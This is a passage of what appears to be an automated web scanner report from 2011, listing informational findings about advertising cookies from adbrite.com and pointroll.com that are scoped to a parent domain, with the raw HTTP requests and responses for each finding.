rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; 
vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

8.9. http://ads.adbrite.com/adserver/behavioral-data/8203

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; 
vsd=0@1@4dcbc6b1@cdn.turn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

8.10. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-